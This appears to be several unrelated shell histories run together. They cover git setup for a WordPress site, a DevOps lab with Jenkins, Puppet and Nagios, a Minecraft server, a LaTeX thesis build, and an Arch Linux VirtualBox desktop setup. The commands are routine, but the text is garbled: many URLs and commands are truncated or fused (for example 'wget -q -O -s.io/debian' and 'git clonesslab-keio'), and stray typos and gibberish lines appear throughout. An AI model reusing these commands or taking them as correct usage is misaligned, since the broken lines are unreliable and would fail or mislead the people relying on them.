ignore Storage/ +git --help +nano .gitignore +git status +nano .gitignore +git add . +ssh-keygen -t rsa -C "pete.lower@gmail.com" +pbcopy < ~/.ssh/id_rsa.pub +git status +git add . +git add * +ls +git status +git add -a +git add -A +ls +git add --ignore-errors . +git config user.name "Pete Lower' +git config user.name "Pete Lower" +git config user.email "pete.lower@gmail.com" +git add . +ls +nano .gitignore +git status +touch php.ini +ls +nano php.ini +nano .gitignore +git status +nano .gitignore +git status +git add * +git add . +git status +ls +git commit -m 'adding initial site' +git remote add origin item9andthemadhatters.com +git push -u origin master +git remote add origin git@github.com:LowerMedia/item9andthemadhatters.com.git +git push -u origin master +git status +git push -u +git push +git remote show orign +git remote show origin +git remote +git remote show origin +pwd +ls +git remote add origin /kunden/homepages/44/d353475670/ +git remote add origin item9andthemadhatters.com/kunden/homepages/44/d353475670/ +git remote +git origin +pwd +ls +ls +ls +git init +git status +ls +nano .gitignore +git remote show origin +ls +rm -rf .git +ls +git init +ls +nano .gitignore +git status +git add . +git commit -m "adding wordpress files" +git push -u origin master +git config --get-regexp '^(remote|branch)\.' +ls +git remote add orgin2 git@github.com/LowerMedia/item9andthemadhatters.com.git +git push remote -u origin2 +git push remote origin2 +ls +ls +git config --global user.name "Pete Lower" +git config --global user.email "pete.lower@gmail.com" +git credential-osxkeychain +curl -s -Os.s3.amazonaws.com/osx/git-credential-osxkeychain +git credential-osxkeychain +sudo git credential-osxkeychain +which git +git config --global github.name "hawkeye126" +git push remote origin +git push +git push master +git push origin master +ls +git status +git push +ls +ls +git status +git remote show origin +nano .git/config +nano .git/ +ls +nano config +ls +git push -u origin master +git push origin +git clone git@github.com:LowerMedia/item9andthemadhatters.com.git +ls +git status +ls +git status +git remote show origin +ls +ls +git rm -rf .git +ls +ls +ls +git rmdir -rf +rm -rf .git +ls +git status +git add . +ls +git status +git push -u +git status +git commit -m 'adding site files' +git push -u +ls +git status +ls +ls +ls +ls +nano functions.php +git status +ls +ls +git add . +git commit -m "adding to functions.php" +git push -u master +git push -u +ls +ls +ls +git status +ls +ls +git status +git add . +git commit -m "adding new site files" +git push -u +ls +ls +nano custom.css +git status +git add . +git commit -m "removing marquee ad at bottom with css" +git push -u +ls +git status +git add . +git push -u +git commit -m "adding new posts, old changes" +git push -u +ls +git status +git add . +git commit +git commit -m "updates" +git push -u origin +git pull -u +ls +git pull -u +ls +git pull -u +ls +git status +git pull -u +git status +git commit -a +ls +git status +git pull -u +ls +git diff +ls +git reset --hard HEAD +ls +git status +git pull -u +git checkout HEAD^ wp-content/themes/i9-responsive-child-theme/home.php +git status +git pull -u +git commit -m " +using old home.php" +git pull -u +ls +git pull -u +ls +git status +git add . +git commit -m "adding current site files" +git push -u +ls +git pull -u +git pull-u +git pull -u +ls +ls +ls +cp responsive/404.php i9-responsive-child-theme/404.php +ls +git push -u +ls +pwd +ls +ls -a +nano .hta +nano .htaccess +nano php.ini +nano .htaccess +ls +ls -a +nano robots.txt +git clone --recursive git://github.com/wp-cli/wp-cli.git ~/git/wp-cli +ls +ls +ls +nano README.md +sudo utils/dev-build +ls +dev-build +sudo dev-build +ls +ls +ls +git status +su +su edureka +git +exit +su edureka +su +git --version +ant -version +clear +mvn -version +clear +sudo apt-get purge default-jdk -y && sudo apt-get purge default-jre -y && sudo apt-get autoremove -y +sudo add-apt-repository -y ppa:openjdk-r/ppa && sudo apt-get update +sudo apt-get install -y openjdk-8-jdk ant maven git +sudo echo 2 | sudo update-alternatives --config java +sudo update-alternatives --config javac +clear +java -version +clear +sudo service nagios start +clear +uname -r +clear +sudo service nagios start +ifconfig +sudo hostname +sudo gedit /etc/hostname +sudo gedit /etc/hosts +ifconfig +ls +ll -a +ifconfig +rm -rf .ssh +sudo ssh reload +service ssh reload +sudo service ssh reload +sudo apt-get install openssh-server +cat /etc/hosts +ping test02.edureka.com +ssh-keygen -t rsa +cat .ssh/id_rsa.pub >> .ssh/authorized_keys +ssh-copy-id -i .ssh/id_rsa.pub edureka@ +ssh-copy-id -i .ssh/id_rsa.pub edureka@test02.edureka.com:/home/edureka/.ssh/authorized_keys +sudo reboot +ssh-copy-id -i .ssh/id_rsa.pub edureka@test02.edureka.com:/home/edureka/.ssh/authorized_keys +ssh edureka@test02.edureka.com +ssh test02.edureka.com +sudo passwd jenkins +sudo gedit /var/lib/jenkins/config.xml +clear +sudo apt-get purge jenkins +wget -q -O -s.io/debian/jenkins-ci.org.key | sudo apt-key add - +sudo sh -c 'echo debs.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list' +sudo apt-get update +sudo apt-get install -y jenkins +sudo apt-get update +sudo apt-get install -y jenkins +clear +sudo gedit /var/lib/jenkins/secrets/initialAdminPassword +sudo service jenkins stop +sudo apt-get purge jenkins +clear +wget -q -O -s.io/debian/jenkins-ci.org.key | sudo apt-key add - +sudo sh -c 'echo debs.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list' +sudo apt-get update +sudo apt-get install -y jenkins +sudo gedit /var/lib/jenkins/secrets/initialAdminPassword +sudo service jenkins status +sudo gedit /var/lib/jenkins/secrets/initialAdminPassword +puppet module install puppetlabs-apache --version 1 +ls +sudo gedit site.app +sudo gedit site.pp +puppet cert list +sudo gedit /etc/puppet/manifests/site.pp +clear +ls /etc/puppet/ +ls /etc/puppet/modules +ls +clear +ls /etc/puppet/ +ls +hostname +sudo service jenkins restart +ls +tar -xvf maven.zip +ifconfig +su] +su +sudo service nagios status +sudo usermod -aG sudo nagios +sudo service nagios status +sudo service nagios stop +sudo service nagios start +sudo service nagios status +ssh +]ifconfig +ifconfig +hostname +vi /etc/hosts +ping +sudo service nagios status +edureka@test01:~$ +ping google.com +sudo reboot +ssh localhost +uname -a +vi /etc/group +ls +su -nagios +su nagios +ls +vi nagios +ls +ls | grep nagioa +ls | grep nagios +ls | grep na* +ls +ls | grep group +ls +vi group +locate nagios +which nagios +search nagios +vi /etc/init.d/nagios +vi /etc/nagios +ls +ls +locate nagios +ls -a +nagios +nagios s +ls +vi /etc/init.d/nagios +vi /etc/nagios.conf +vi /etc/init.d/nagios +vi /usr/ +ls +ls | grep nagios +su nagios +visudo +sudo visudo +vi /etc/sudoers +ls | grep sudo* +ls +java +vi /etc/sudoers +su +ls +vi config.xml +ls +ansible --version +ansible -version +sudo apt-get install ansible +sudo apt-get update +mvn --version +sudo apt-get purge mvn +sudo apt-get purge maven +sudo apt-get install maven3 +sudo -H gedit /etc/apt/sources.list +git --version +sudo service jenkins status +mvn -version +java -version +sudo service puppetmaster status +sudo service nagios status +logout +killall -u +pkill -u edureka +service puppet status +service puppetmaster status +service puppetagent status +vi /etc/puppet/puppet.conf +sudo vi /etc/puppet/puppet.conf +cat /etc/hosts +killall -u edureka +cat /etc/hosts +ssh +killall -u edureka +puppet master --no-daemonize -d -v +puppet cert -all and -list +sudo puppet cert -all and -list +puppet master --no-daemonize -d -v +sudo puppet cert -all and -list +kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk +killall -u edureka +w +uname -a +screen -ls +screen kill +screen ls +screen -ls +nano stop.sh +x +x +ls +cls +clr +ls +./stop.sh +screen -r minecraft +screen -ls +nano start.sh +./stop.sh +nano start.sh +./start.sh +ls +nano start.sh +nano start.sh +./start.sh +ls +nano start2.sh +nano start2.sh +nano start2.sh +chmod +x start2.sh +./start2.sh +apt-get install tmux +nano start.sh +./start +./start.sh +ls +screen +pwd +wgetsmirror.com/files/spigot/spigot-latest.jar +ls +wgetsmirror.com/files/craftbukkit/craftbukkit-latest.jar +nano start.sh +nano start.sh +nano stop.sh +chmod +x start.sh stop.sh +./start.sh +ls +bash ./start.sh +ls +nano eula.txt +ls +nano test.sh +ls +./test.sh +chmod +x test.sh +./test.sh +nano start.sh +./start.sh +ls +rm test.sh +screen -r minecraft +script /dev/null +ls +./start.sh +ls +./stop.sh +./start.sh +./stop.sh +ls +nano start.sh +ls +nano start.sh +./start.sh +ls +ls +ls +ls +rm * +apt-get install -t jessie-backports openjdk-8-jre-headless -y +su +ls +touch start.sh stop.sh +ls +nano start.sh +nano stop.sh +stat.sh +ls +./start.sh +chmod u+x start.sh +chmod u+x stop.sh +ssssss +ls +./start.sh +nano start.sh +yum install screen +apt-get screen +apt-get yum +apt-get install screen +sudo apt-get install screen +sudo apt-get install screen +su +ls +touch +touch start.sh +echo $HOME +pwd +su +su +ls +touch start.sh stop.sh +su +ls +screen -r minecraft +ls +./start +./start.sh +ls +screen -ls +./stop.sh +ls +screen -ls +killall screen +screen -ls +./start.sh +ls +screen -ls +screen -r minecraft +creen -ls +ls +java -jar spigot +java -jar spigot-latest.jar +ls +nano crash-reports/ +ls +nano crash-2018-11-17_23.32.11-server.txt +ls +ls +rm session.lock +rm session.lock +su +ls +ls +wgetspigotmc.org/resources/autobackup.53875/download?version=210363 +wgets/dynmap/files/latest +ls +cls +clr +cl +clear +ls +wgets/dynmap/files/latest +su +ls +./start.sh +ls +nano start.sh +java craftbukkit-latest.jar +java -har spigot-latest.jar +java +java -version +java +sudo update-alternatives --config java +su +screen -s +screen -ls +screen -r minecraft +ls +./stop.sh +ls +script /dev/null +ls +/home/minecraft/ +ls +ls +nano start.sh +java +java --v +java --versioj +java --version +java -v +apt list --installed +apt-get install default-jre +sudo +su +exit +dpkg-reconfigure keyboard-configuration +clear +shutdown -h now +clear +pwd +cleaar +clear +is +ls +shutdown -h 2 +clear +pwd +mkdir +pwd +mkdir +ls +mkdir doc +ls +rm -r doc +ls +clear +history +clear +vi carta +vi carta +vi carta +vi carta +vi carta +clear +ls +rm carta +ls +clear +exit +vim 05_ple_experiments.tex +make +vim 06_apples_experiments.tex +make +vim 06_apples_experiments.tex +vim 03_relatedwork.tex +vim 06_apples_experiments.tex +make +vim 06_apples_experiments.tex +vim 06_apples_experiments.tex +vim 06_apples_experiments.tex +make +make +vim 06_apples_experiments.tex +make +vim 06_apples_experiments.tex +make +vim 06_apples_experiments.tex +git add . +git commit -m "proofreading all chapter" +git push -u origin yamasaki +vim thesis.tex +ls +vim thesis.tex +vim 03_relatedwork.tex +make +vim 03_relatedwork.tex +make +vim 03_relatedwork.tex +make +git diff +git add . +git commit -m "remove safe_point figure" +git push -u origin yamasaki +vim references.bib +vim abstract.tex +vim abstract-ja.tex +vim abst_check.txt +cp abst_check.txt abst_check1.txt +vim abst_check +vim abst_check.txt +make +vim abst_check.txt +make +vim abst_check.txt +vim abst_check.txt +make +vim abstract-ja.tex +vim abstract.tex +vim abstract.tex +make +vim abstract.tex +vim abstract.tex +vim abst_check +vim abst_check.txt +make +vim abstract-ja.tex +make +vim thesis.tex +make +vim thesis.tex +vim abstract.tex +vim abstract.tex +vim abst_check.txt +vim abstract-ja.tex +vim abstract.tex +vim abstract.tex +vim abstract-ja.tex +mae +make +vim abstract +vim abstract.tex +make +ls +vim 01_introduction.tex +vim 02_problems.tex +vim 07_conclusion.tex +vim 07_conclusion.tex +vim 07_conclusion.tex +vim 07_conclusion.tex +vim 07_conclusion.tex +make +ls +ls +ls +ls +ls +ls +vim get_from_guest.sh +ls +ls +ls +ls +ls +vim mail.txt +ls +sftp kvm-host +sftp kvm-host +sftp kvm-host +sftp kvm-host +sftp kvm-host +sftp kvm-host +sftp kvm-host +sftp kvm-host +sftp kvm-host +sftp kvm-host +sftp kvm-guest- +sftp kvm-guest-1 +sftp kvm-guest-1 +sftp kvm-guest-2 +sftp kvm-guest-2 +ls +ls +mv SW_DVD5_Office_Mac_Standard_2016_MultiLang_-7_.dmg_MLF_X21-15621.ISO ../Documents/sslab/ +sftp kvm-guest-1 +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +vim 01_introduction.tex +ls +vim 00_index. +vim 00_index.tex +ls +vim mlarticle.cls +ls +ls +ls +ls +vim 00_index. +vim 00_index.tex +vim 09_reference.tex +ls +vim 01_introduction.tex +ls +mv references.bib reference.bib +vim mlarticle.cls +vim 00_index. +vim 00_index.tex +vim 09_reference.tex +ls +ls +ls +ls +ls +ls +ls +ls +ls +vim 12_8d.py +vim 12_8a.py +vim 12_8a2.py +ls +ls +ls +vim get_from_host.sh +ls +ls +ls +ls +ls +vim preemptableTicket.pdf +vim preemptableTicket.pdf +vim preemptableTicket.pdf +ls -l +vim preemptableTicket.pdf +ls +vim .tmux.conf +ls +sslab-keio/master_template.git +git clonesslab-keio/master_template.git +git clonesslab-keio/master_template.git +ls +ls +vim Makefile +make +ls +open thesis. +open thesis.pdf +ls +vim Makefile +ls +vim thesis.tex +make +vim thesis.tex +make +vim thesis.tex +ls +vim introduction.tex +ls +vim thesis.tex +ls +vim thesis.tex +make +vim thesis.tex +make +ls +vim thesis.tex +vim thesis.tex +ls +vim masterthesis.cls +make +vim masterthesis.cls +make +vim masterthesis.cls +make +vim masterthesis.cls +make +vim masterthesis.cls +make +vim masterthesis.cls +make +vim masterthesis.cls +make +vim masterthesis.cls +ls +vim abstract-ja.tex +ls +vim abstract.tex +ls +ls +vim outline.txt +vim outline.txt +git branch -a +git checkout -b yamasaki +git branch -a +git add -a +git add . +git diff +git commit -m "first commit" +ls +git branch master +git checkout master +ls +vim thesis.tex +git checkout yamasaki +git remote set-url originsakiSS/yamasaki_master.git +git remote -v +git push -u origin yamasaki +ls +vim outline.txt +ls +vim thesis. +vim thesis.tex +ls +vim abstract-ja.tex +make +ls +open thesis.pdf +ls +make +vim introduction.tex +ls +vim thesis.tex +ls +ls +make +vim .latexmkrc +ls +make +ls +mv reference.bib references.bib +make +make +make clean +ls +make +ls +vim abstract-ja.tex +vim abstract.tex +ls +vim abstract-ja.tex +ls +vim references.bib +make +vim thesis.tex +make +vim thesis.tex +make +make +make +vim introduction.tex +vim thesis.bbl +make clean +ls +rm thesis.bbl +ls +make +ls +vim thesis.bbl +vim thesis.tex +ls +vim thesis.tex +make +git branch +git checkout master +ls +vim thesis.tex +make +ls +git branch +make +ls +vim thesis.bbl +ls +vim masterthesis.cls +make +make +vim masterthesis.cls +make +make +make +vim masterthesis.cls +make +make +make +vim masterthesis.cls +make +make +vim masterthesis.cls +make +make +make +vim masterthesis.cls +make +make -H +make -h +make +make +make +make +vim masterthesis.cls +make +vim masterthesis.cls +vim masterthesis.cls +vim thesis.tex +vim masterthesis.cls +vim thesis.tex +ls +vim Makefile +ls +vim thesis.bbl +make +vim thesis.bbl +vim thesis.bbl +ls +vim thesis.tex +vim introduction.tex +vim masterthesis.cls +vim masterthesis.cls +make +make +vim masterthesis.cls +make +vim masterthesis.cls +vim masterthesis.cls +vim thesis.lo +vim thesis.log +vim masterthesis.cls +vim masterthesis.cls +vim masterthesis.cls +make +vim masterthesis.cls +make +vim masterthesis.cls +make +vim thesis.log +make +vim thesis.log +vim masterthesis.cls +make +ls +vim references.bib +vim thesis.tex +make clean +ls +make +make +make +vim thesis.tex +make +ls +vim abstract-ja.tex +vim thesis.tex +vim introduction.tex +vim thesis.tex +make +vim thesis.tex +ls +git add . +git branch +git commit -m "change list names" +git remote -v +git push -u origin yamasaki +vim introduction.tex +ls +cp references.bib ~/Documents/sslab/grad/tex/yamasaki/tex/ +vim .gitignore +git add . +git diff HEAD yamasaki +cp b4/tex/01_introduction.tex . +ls +rm introduction.tex +vim thesis.tex +ll +chmod 01_introduction.tex 644 +chmod 644 01_introduction.tex +chmod 644 references.bib +ls +ll +vim 01_introduction.tex +ls +mkdir image +vim 01_introduction.tex +ls +ls +ls +vim mail.txt +vim mail.txt +vim mail.txt +vim mail.txt +vim mail.txt +vim mail.txt +vim README.txt +vim mail.txt +wgetsakiSS/APPLES_linux/commit/dcde5365d6cae246d9032b7a480e2778b10013ff.patch -o vcpu_change.patch +ls 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+#1397649205 +sudo -E ll / +#1397649232 +sudo ls /dev/ +#1397649237 +sudo ls /mnt/ +#1397649466 + +#1397649469 +ping qq.com +#1397649505 +echo $PROMPT_COMMAND +#1397649731 +systemctl status +#1397649766 +systemctl start sshd.service +#1397649769 +sudo systemctl start sshd.service +#1397649774 +systemctl status +#1397649809 +systemctl status -a +#1397650279 +sudo pacman -Ss arch +#1397652414 +halt --help +#1397652544 +sudo systemctl status | grep hal +#1397653356 +ll /dev +#1397653358 +ls /dev +#1397651032 +#1397651033 +ll +#1397651213 +ll +#1397654595 +sudo pacman -Si ivman +#1397654610 +sudo pacman -Si autofs +#1397654805 +fdisk -l +#1397654808 +sudo fdisk -l +#1397654822 +sudo fdisk -a +#1397654825 +sudo fdisk -l +#1397655178 +df +#1397656101 +ll /dev/cdrom +#1397656122 +mount -t auto /dev/cdrom /mnt/cdrom +#1397656126 +sudo mount -t auto /dev/cdrom /mnt/cdrom +#1397656144 +mkdir /mnt/cdrom && sudo mount -t auto /dev/cdrom /mnt/cdrom +#1397656152 +sudo mkdir /mnt/cdrom && sudo mount -t auto /dev/cdrom /mnt/cdrom +#1397656168 +ll /mnt/cdrom/ +#1397656207 +vim /mnt/cdrom/autorun.sh +#1397656261 +./autorun.sh +#1397656282 +#1397656285 +./autorun.sh +#1397656497 +fg +#1397656500 +vim runasroot.sh +#1397656712 +ll +#1397656714 +ls +#1397656719 +alias +#1397656729 +ll +#1397656733 +ls +#1397656747 +ll --color=none +#1397656788 +sudo sh ./VBoxLinuxAdditions.run +#1397656838 +fg +#1397656848 +vim VBoxLinuxAdditions.run +#1397656948 +fg +#1397657272 +ll +#1397657346 +fg +#1397657352 +vim VBoxLinuxAdditions.run +#1397657435 +fg +#1397657716 +su - +#1397659747 +#1397659759 +umount /dev/cdrom +#1397659762 +sudo umount /dev/cdrom +#1397659773 +ll /mnt/ +#1397659775 +ll /mnt/cdrom/ +#1397659818 +vim /etc/X11/xinit/ +#1397660367 +jobs +#1397660369 +sync +#1397661760 +sudo vi /etc/X11/xorg.conf.d/50-xrandrdisplay.conf +#1397661797 +rm /etc/X11/xorg.conf.d/50-vboxdisplay.conf +#1397661806 +sudo rm /etc/X11/xorg.conf.d/50-vboxdisplay.conf +#1397661820 +ll /etc/X11/xorg.conf.d/ +#1397661837 +vim /etc/X11/xorg.conf.d/ +#1397661872 +sudo reboot +#1397661443 + +#1397661447 +jobs +#1397661454 +vim /var/log/Xorg.0.log +#1397661695 +sudo systemctl start sshd.service +#1397661705 +iptables -nvL +#1397661707 +sudo iptables -nvL +#1397661965 +vim /var/log/Xorg.0.log +#1397662176 +vim /etc/X11/xorg.conf.d/50-xrandrdisplay.conf +#1397662743 +lspci | grep VGA +#1397663923 +ll .xinitrc +#1397663929 +cat .xinitrc +#1397664220 +lspci +#1397664359 +sudo pacman -Qs xf86 +#1397664411 +sudo pacman -Qs xf86-video-ati +#1397664475 +sudo pacman -Rs xf86-video-ati +#1397664515 +lspci +#1397664526 +lspci | grep VGA +#1397664548 +sudo pacman -Ss VirtualBox Graphics +#1397664552 +sudo pacman -Ss VirtualBox +#1397664599 +lspci | grep VGA +#1397664679 +sudo pacman -Qs VirtualBox +#1397664716 +sudo pacman -S virtualbox-guest +#1397665702 +sudo pacman -S virtualbox-guest- +#1397665726 +klist +#1397665731 +history +#1397665783 +kmod +#1397665786 +kmod -l +#1397665790 +kmod list +#1397665801 +kmod list | virtual +#1397665809 +kmod list | grep virtual +#1397665812 +kmod list | grep virtua +#1397665818 +kmod list | less +#1397665870 +ip addr +#1397665887 +systemctl start sshd.service +#1397665893 +sudo systemctl start sshd.service +#1397669930 +cvt 1366 768 +#1397669959 +xrandr --newmode "1368x768_60.00" 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync +#1397670036 +xrandr +#1397670126 +xrandr --addmode VGA1 1368x768_60.00 +#1397670592 +sudo pacman -Ss slim +#1397670651 +sudo pacman -S archlinux-themes-slim slim-themes +#1397670678 +ll /usr/share/slim/themes/ +#1397670698 +vim /etc/slim.conf +#1397670706 +sudo vim /etc/slim.conf +#1397670714 +sudo -E vim /etc/slim.conf +#1397670734 +vim .bashrc +#1397670766 +source .bashrc +#1397670777 +sudo vim /etc/slim.conf +#1397671134 +jobs +#1397666343 +less /var/log/Xorg.0.log +#1397666975 +cvt 1280 800 60 +#1397667211 +startx +#1397667437 +jobs +#1397667447 +vim /var/log/Xorg.0.log +#1397667686 +ll /etc/X11/xorg.conf.d/ +#1397667935 + +#1397668064 +vim /var/log/Xorg.0.log +#1397668664 +sudo systemctl start sshd.service +#1397668709 +startx +#1397668963 +startx +#1397669692 +startx +#1397671150 +startx +#1397671173 +startx +#1397671815 +sudo pacman -Ss pacman +#1397671961 +sudo pacman -Ss pacmanfs +#1397671966 +sudo pacman -Ss pacmanfm +#1397671979 +sudo pacman -Ss pcmanfm +#1397671989 +sudo pacman -S pcmanfm +#1397672035 +vim .i3/config +#1397672498 +vim .i3/config +#1397672994 +sudo pacman -Ss lxrandr +#1397673000 +sudo pacman -S lxrandr +#1397673009 +lxrandr +#1397673157 +vim .i3/config +#1397673752 +fg +#1397674688 +vim .i3/config +#1397675109 +jfsda +#1397675111 +: +#1397675123 +:q +#1397676684 +vim .i3/config +#1397676724 +ls +#1397676725 +l +#1397676725 +ll +#1397676739 +fg +#1397676969 +time %R +#1397676970 +time +#1397676972 +time --help +#1397676974 +time -h +#1397676975 +man time +#1397677043 +time -p +#1397677049 +date +#1397677075 +vim .i3/config +#1397678721 +pacman -S xf86-video-vesa +#1397678724 +sudo pacman -S xf86-video-vesa +#1397678747 +sudo pacman -Ss xorg +#1397678781 +sudo pacman -Ss base-devel +#1397678816 +sudo pacman -Ss kernel26-headers +#1397678826 +sudo pacman -S kernel26-headers +#1397678843 +kmod -l +#1397678846 +kmod +#1397678852 +kmod list +#1397678888 +modprobe loop +#1397678954 +mount /dev/cdrom /mnt/cdrom/ +#1397678957 +sudo mount /dev/cdrom /mnt/cdrom/ +#1397678968 +#1397678968 +ll +#1397678974 +sh VBoxLinuxAdditions.run +#1397679012 + su - +#1397681908 +kmod list | head +#1397681911 +kmod list | grep vbox +#1397681919 +sudo pacman -Ss virtualbox +#1397681933 +sudo pacman -S virtualbox-guest-utils +#1397681947 +ll /usr/binVB* +#1397681950 +ll /usr/bin/VB* +#1397681971 +#1397681972 +ll +#1397681974 +ll VBoxGuestAdditions-4.3.6/ +#1397681981 +vim VBoxGuestAdditions-4.3.6/ +#1397681994 +#1397681996 +./uninstall.sh +#1397682000 +sudo ./uninstall.sh +#1397682002 +ll +#1397682005 +rm . +#1397682009 +rmdir . +#1397682012 +#1397682014 +rmdir VBoxGuestAdditions-4.3.6/ +#1397682015 +sudo rmdir VBoxGuestAdditions-4.3.6/ +#1397682015 +ls +#1397682016 +ll +#1397682022 +ll /usr/bin/VB* +#1397682085 +sudo ll /usr/bin/VB* +#1397682087 + +#1397682102 +sudo pacman -S virtualbox-guest-utils +#1397682139 +kmod list +#1397682159 +sudo vim /etc/modules-load.d/vbox.conf +#1397682168 + +#1397682176 +source /etc/modules-load.d/vbox.conf +#1397682185 +modprobe -a vboxguest vboxsf vboxvideo +#1397682336 + +#1397682341 +sudo modprobe -a vboxguest vboxsf vboxvideo +#1397682342 +kmod list +#1397682514 +lspci +#1397683060 +ll +#1397683062 +#1397683063 +jobs +#1397683065 +vim /etc/X11/xorg.conf.d/ +#1397683322 +sudo vim /etc/X11/xorg.conf.d/ +#1397683607 +#1397683608 +vim .xinitrc +#1397683736 +fg +#1397683786 +fh +#1397683787 +fg +#1397683790 +ll /var/log/ +#1397683793 +fg +#1397684107 +VBoxClient-all +#1397684110 +lxrandr +#1397684120 +xrandr +#1397684153 +cvt 1366 768 +#1397684162 +xrandr --newmode "1368x768_60.00" 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync +#1397684173 +systemctl status | grep vbox +#1397684183 +systemctl status +#1397684244 +xrandr --newmode "1368x768_60.00" 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync +#1397684247 +xrandr +#1397684249 +lxrandr +#1397684373 +xrandr +#1397685630 +xrandr --addmode default --mode 1368x768_60.00 +#1397686042 +sudo vim /etc/X11/xorg.conf +#1397686066 +sudo systemctl start sshd.service +#1397686168 +sudo systemctl enable sshd.service +#1397737210 +ls +#1397737212 +ll +#1397737225 +pwd +#1397737228 +#1397737229 +ll +#1397737231 +ls +#1397737263 +ll +#1397737264 +ls +#1397737297 +startx +#1397737346 +echo $LANG +#1397737384 +ll /etc/X11/xorg.conf.d/ +#1397737416 +systemctl status +#1397737421 +sudo systemctl status +#1397737433 +ll +#1397737435 +ls +#1397737446 +vim .xsession +#1397737469 +vim .xinitrc +#1397737531 +ll +#1397737532 +ls +#1397737537 +fg +#1397737542 +vi .xinitrc +#1397737604 +ll /etc/X11/xorg.conf.d/ +#1397737619 +ll 10-monitor.conf +#1397737643 +top +#1397737652 +htop +#1397737715 +vi /var/log/Xorg.0.log +#1397737847 +vi .xinitrc +#1397742138 +startx +#1397742177 +su - +#1397742188 +su - +#1397742414 +startx +#1397742426 +vim .xinitrc +#1397742443 +startx +#1397742497 +reboot +#1397750217 +date +#1397750244 +sudo pacman -Syu +#1397750749 +vim .i3/config +#1397750872 +fg +#1397751006 +fg +#1397751188 +fg +#1397751211 +fg +#1397754076 +. +#1397754097 +#1397754100 +ls +#1397754102 +ll +#1397751692 +du +#1397751768 +du -h .i3/i3log +#1397752391 +fg +#1397753086 +setfont --help +#1397753093 +setfont +#1397753102 +setarch +#1397753106 +setarch --help +#1397753113 +setarch -v +#1397753625 +urxvt --help +#1397753652 +urxvt --help | grep font +#1397753723 +man urxvt +#1397754043 +sudo pacman -Ss tmux +#1397754056 +sudo pacman -S tmux +#1397754068 +tmux +#1397755019 +vim .i3/config +#1397755091 +mkdir hcj-cfg +#1397755155 +ls +#1397755156 +ll +#1397755187 +fg +#1397756088 + +#1397756140 +logout +#1397756146 +exit +#1397754686 +tmux +#1397754836 +fg +#1397754844 +tmux +#1397756155 +exit +#1397765429 +top +#1397765442 + +#1397765466 +vim .Xresources +#1397765481 +rm .Xresources.swp +#1397765494 +vim .Xresources +#1397765589 +xrdb .Xresources +#1397765248 +history +#1397768037 +tail .i3/i3log +#1397768051 +tail -h +#1397768055 +tail --help +#1397768085 +tail -n 100 .i3/i3log +#1397768090 +tail -n 100 .i3/i3log | less +#1397768143 +fg +#1397768152 +vim .i3/config +#1397768168 +rm .i3/.config.swp +#1397768181 +vim .i3/config +#1397768442 +exit +#1397768444 +exit +#1397768415 +#1397768416 +ll +#1397768423 +./tmux-new-session.sh +#1397768450 +fg +#1397768459 +sh tmux-new-session.sh +#1397768477 +vim tmux-new-session.sh +#1397768525 +ll ../Picture/screenshots/ +#1397768528 +ll ~ +#1397768536 +ll +#1397768539 +ll ../Picture/screenshots/ +#1397768548 +fg +#1397768566 +./screen.sh +#1397768605 +vim screen.sh +#1397768643 +cat screen.sh +#1397768737 +fg +#1397768816 +./screen.sh +#1397768837 +ll .. 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URxvt*/gp' >> ~/.Xresources +#1397757954 +cat .Xresources +#1397758031 +vim .Xresources +#1397758120 +TERM=dump command man -Pcat urxvt | sed -n '/depth: b/,/^BA/p'|sed '$d'|sed '/^ [a-z]/s/^ */^/g'|sed -e :a -e 'N;s/ +/@@/g;ta;P;D'|sed 's,\^\([^@]\+\)@*[\t ]*\([^\^]\+\),! \2 +! URxvt*\1 + +,g'|sed 's,@@\( \+\), +\1,g'|sed 's,@*$,,g'|sed '/^[^!]/d'|tr -d "'\`" >> ~/.Xresources2 +#1397758125 +fg +#1397758308 +rm .Xresources2 +#1397758340 +vim .Xresources +#1397760636 +jobs +#1397760754 +fg +#1397760779 +fg +#1397764547 +xrdb .Xresources +#1397764581 +fg +#1397764718 +xrdb .Xresources +#1397764736 +fg +#1397764796 +fg +#1397764816 +xrdb .Xresources +#1397770311 +e +#1397770403 +jkq +#1397770468 +f +#1397766411 +ll +#1397766413 +ls +#1397766418 +ll +#1397766443 +systemctl status +#1397766506 +ll git-source/dotfiles/tmux/tmux.conf +#1397766521 +mkdir tmux +#1397766535 +rmdir tmux/ +#1397766541 +mkdir .tmux +#1397766566 +cp git-source/dotfiles/tmux/tmux.conf ~/.tmux/ +#1397766573 +ll .tmux/ +#1397766598 +ll .i3 +#1397770271 +Q +#1397770344 +jk +#1397766836 +ll .tmux/ +#1397766874 +mv .tmux/tmux.conf . +#1397766884 +ll .tmux/ +#1397766892 +rmdir .tmux/ +#1397766909 +mv tmux.conf .tmux +#1397770271 +D +#1397770344 +ejk +#1397772380 +ls +#1397772381 +ll +#1397772384 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+vim bin/ +#1397771718 +urxvt +#1397771765 +mv .Xresources.bak .Xresources +#1397771772 +vi .Xresources +#1397771790 +vi .Xresources +#1397771816 +vi .i3/config +#1397771865 +vi .bashrc +#1397771993 +startx +#1397772253 +vi .Xresources +#1397772273 +vi .Xresources +#1397772327 +startx +#1397775464 +startx +#1397772054 +ll .Xresources +#1397772063 +xrdb .Xresources +#1397772350 +vi .Xresources +#1397772362 +xrdb .Xresources +#1397772453 +obs +#1397772454 +jobs +#1397774677 +ls +#1397774678 +ll +#1397774821 +kkk +#1397772089 +vim .Xresources +#1397772168 +xrdb .Xresources +#1397777443 +vim .i3/config +#1398095459 +ls +#1398095461 +ll +#1398095496 +sudo pacman -Rs rxvt +#1398095514 +sudo pacman -Ql +#1398095588 +sudo pacman -Rs rxvt-unicode +#1398095319 +startx +#1398095642 +q +#1398095646 +l +df -Th +ls -l / +df -Th +apt-get update && apt-get upgrade -y +sudo apt-get update +sudo apt-get 